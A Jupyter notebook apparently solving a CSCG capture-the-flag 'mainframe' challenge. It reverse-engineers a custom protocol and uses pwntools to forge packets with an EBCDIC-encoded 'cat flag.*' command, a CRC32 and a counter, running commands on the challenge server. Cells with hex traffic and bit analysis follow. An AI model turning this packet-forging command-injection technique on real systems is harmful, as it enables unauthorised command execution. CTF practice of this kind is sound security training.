In [127]:
from pwn import *
import pandas as pd
import ebcdic
import zlib
import base64
import ebcdic

In [2]:
def nicehex(b: bytes) -> str:
    h = b.hex()
    return " ".join(h[i:i+2] for i in range(0,len(h),2))

'0x25'

In [170]:


def setup():
    
    data = []
    
    r = remote("b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live",31337,ssl=True)

    k = r.recv(1024,timeout=1)
    data.append(nicehex(k))
    
    counter = bytearray(k[-4:])
    counter[0:1] = bytes([counter[0] + 1])
    
    to_send = bytes.fromhex("02 00 00 00 00 00 00") + counter
    data.append(nicehex(to_send))
    print("Sending: ",nicehex(to_send))
    r.send(to_send)
    
    k = r.recv(1024,timeout=1)
    data.append(nicehex(k))
    
    counter = bytearray(k[-4:])
    counter[0:1] = bytes([counter[0] + 1])
    #                        xx ll ll  p  w  d  % zz zz zz zz
    # ll = len(payload + "%")
    # xx = type command
    
    command = 'cat flag.*'.encode('cp1148') + bytes([ord("%")])
    print("Command: ", nicehex(command))
    crc = zlib.crc32(command).to_bytes(4,"little")
    print("CRC: ",nicehex(crc))
    to_send = bytes.fromhex("10") + bytes([len(command),0]) + command + crc + counter
    # to_send = bytes.fromhex("10 04 00 97 a6 84 25 db ae cd c8") + counter + b"\n"
    
    data.append(nicehex(to_send))
    print("Sending: ",nicehex(to_send))
    r.send(to_send)
    
    k = r.recv(1024,timeout=1)
    data.append(nicehex(k))
    
    r.close()
    
    return data

In [171]:
k1,k2 = setup(),setup()

[x] Opening connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live on port 31337
[x] Opening connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live on port 31337: Trying 147.75.32.185
[+] Opening connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live on port 31337: Done
Sending:  02 00 00 00 00 00 00 a0 d0 79 50
Command:  83 81 a3 40 86 93 81 87 4b 5c 25
CRC:  32 f4 0e d5
Sending:  10 0b 00 83 81 a3 40 86 93 81 87 4b 5c 25 32 f4 0e d5 e2 2c 00 58
[*] Closed connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live port 31337
[x] Opening connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live on port 31337
[x] Opening connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live on port 31337: Trying 147.75.32.185
[+] Opening connection to b3f585cbfa57364f98ddc78b-mainframe.challenge.master.cscg.live on port 31337: Done
Sending:  02 00 00 00 00 00 00 a7 3e 6b 07
Command:  8

In [172]:
k1

['01 00 00 00 00 00 00 9f d0 79 50',
 '02 00 00 00 00 00 00 a0 d0 79 50',
 '03 00 00 00 00 00 00 e1 2c 00 58',
 '10 0b 00 83 81 a3 40 86 93 81 87 4b 5c 25 32 f4 0e d5 e2 2c 00 58',
 '20 27 00 c3 e2 c3 c7 43 f7 83 f2 82 f8 f7 f9 f2 86 f6 84 85 81 f3 86 f8 84 f6 f4 f2 85 f6 f4 f8 f0 81 83 84 81 f3 85 f2 dc 25 c9 83 c4 ca 49 85 bd 2e']

In [166]:
k2

['01 00 00 00 00 00 00 b3 72 62 3f',
 '02 00 00 00 00 00 00 b4 72 62 3f',
 '03 00 00 00 00 00 00 d3 f1 a9 15',
 '10 03 00 89 84 25 15 70 4e 05 d4 f1 a9 15',
 '20 3c 00 a4 89 84 7e f1 f0 f0 f0 4d 97 a6 95 a3 96 96 93 a2 5d 40 87 89 84 7e f1 f0 f0 f0 4d 97 a6 95 a3 96 96 93 a2 5d 40 87 99 96 a4 97 a2 7e f1 f0 f0 f0 4d 97 a6 95 a3 96 96 93 a2 5d 25 0f 16 06 5c e5 cc d9 22']

In [7]:
hex(0xbf + 1)

'0xc0'

In [8]:
c1 = ["7e 1e fe 6c","7f 1e fe 6c","3e 9b 25 76","6a ba d7 7e"]
c2 = ["c0 92 81 69","c1 92 81 69","bf 7b e5 00","db ae cd c8"]

del c1[1]
del c2[1]

f = lambda x: [[int(z,16) for z in y.split(" ")] for y in x]

c1,c2 = f(c1),f(c2)

In [11]:
[print(n,"|".join([format(y, '#010b')[2:] for y in x])) for x,n in zip(c1,"abc")]

a 01111110|00011110|11111110|01101100
b 00111110|10011011|00100101|01110110
c 01101010|10111010|11010111|01111110


[None, None, None]

In [13]:
[print(n,"|".join([format(y, '#010b')[2:] for y in x])) for x,n in zip(c2,"abc")]

a 11000000|10010010|10000001|01101001
b 10111111|01111011|11100101|00000000
c 11011011|10101110|11001101|11001000


[None, None, None]